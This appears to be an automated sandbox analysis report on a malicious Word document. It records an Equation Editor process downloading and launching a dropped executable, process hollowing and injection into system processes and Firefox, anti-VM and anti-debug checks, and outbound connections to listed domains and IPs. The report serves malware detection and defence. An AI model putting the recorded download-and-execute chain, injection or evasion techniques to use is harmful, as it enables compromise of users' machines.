      Source: cleanmgr[1].exe.5.drStatic PE information: 0xCC9419B9 [Thu Oct 6 04:59:37 2078 UTC]
      Source: initial sampleStatic PE information: section name: .text entropy: 7.972271571578518
      Source: initial sampleStatic PE information: section name: .text entropy: 7.972271571578518
      Source: cleanmgr[1].exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csHigh entropy of concatenated method names: '.cctor', 'KahNA02RLQ', 'ggtta4YkY', 'qcO2nEygc', 'Npi0UTOJk', 'RaE6MPYYy', 'LBwxanhI5', 'b2KasMRsr', 'IypbRMOQ7', '.ctor'
      Source: cleanmgr_settings.exe.5.dr, IeaukREKDqU6i5HIfJ/s8lFJHoDc5xtaurZwu.csHigh entropy of concatenated method names: '.cctor', 'KahNA02RLQ', 'ggtta4YkY', 'qcO2nEygc', 'Npi0UTOJk', 'RaE6MPYYy', 'LBwxanhI5', 'b2KasMRsr', 'IypbRMOQ7', '.ctor'

      Persistence and Installation Behavior

      barindex
      Contains an external reference to another file
      Source: settings.xml.relsExtracted files from sample: https://unesa.me/oaeopb
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\cleanmgr[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\cleanmgr_settings.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\cleanmgr_settings.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F061D URLDownloadToFileW,ShellExecuteW,ExitProcess,5_2_035F061D

      Boot Survival

      barindex
      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\cleanmgr_settings.exeJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xE9
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000000C9904 second address: 00000000000C990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 00000000000C9B6E second address: 00000000000C9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3236Thread sleep time: -240000s >= -30000sJump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exe TID: 3352Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 1944Thread sleep count: 33 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 1940Thread sleep time: -360000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3512Thread sleep time: -46000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exe TID: 3528Thread sleep time: -120000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
      Source: C:\Users\Public\cleanmgr_settings.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 766Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008B0101 rdtsc 8_2_008B0101
      Source: C:\Users\Public\cleanmgr_settings.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_5-551
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_5-495
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_5-515
      Source: explorer.exe, 00000009.00000002.1297921404.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
      Source: explorer.exe, 00000009.00000002.1297921404.0000000004385000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: War_VMware_SATA_CD01_______________1
      Source: explorer.exe, 00000009.00000002.1297921404.000000000434F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Q
      Source: explorer.exe, 00000009.00000002.1297921404.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: explorer.exe, 00000009.00000002.1293516891.000000000037B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
      Source: explorer.exe, 00000009.00000002.1297921404.0000000004423000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000009.00000002.1297921404.00000000043F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
      Source: explorer.exe, 00000009.00000000.1036937262.0000000000335000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 5_2_035F0677 mov edx, dword ptr fs:[00000030h]5_2_035F0677
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008726F8 mov eax, dword ptr fs:[00000030h]8_2_008726F8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008B0101 rdtsc 8_2_008B0101
      Source: C:\Users\Public\cleanmgr_settings.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_008600C4 NtCreateFile,LdrInitializeThunk,8_2_008600C4
      Source: C:\Users\Public\cleanmgr_settings.exeMemory allocated: page read and write | page guardJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 13.248.169.48 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.orbit4dads.com
      Source: C:\Windows\explorer.exeDomain query: www.dyj97.com
      Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 104.17.158.1 80Jump to behavior
      Source: C:\Windows\explorer.exeDomain query: www.folado.com
      Source: C:\Windows\explorer.exeDomain query: www.cell-phones-0406-da-sa-fb.xyz
      Maps a DLL or memory area into another process
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Program Files (x86)\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
      Allocates memory in foreign processes
      Source: C:\Users\Public\cleanmgr_settings.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
      Injects a PE file into a foreign processes
      Source: C:\Users\Public\cleanmgr_settings.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
      Sample uses process hollowing technique
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 860000Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeSection unmapped: C:\Program Files (x86)\Mozilla Firefox\firefox.exe base address: 12F0000Jump to behavior
      Writes to foreign memory regions
      Source: C:\Users\Public\cleanmgr_settings.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000Jump to behavior
      Source: C:\Users\Public\cleanmgr_settings.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008Jump to behavior
      Queues an APC in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 1860Jump to behavior
      Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 1860Jump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\cleanmgr_settings.exe "C:\Users\Public\cleanmgr_settings.exe" Jump to behavior
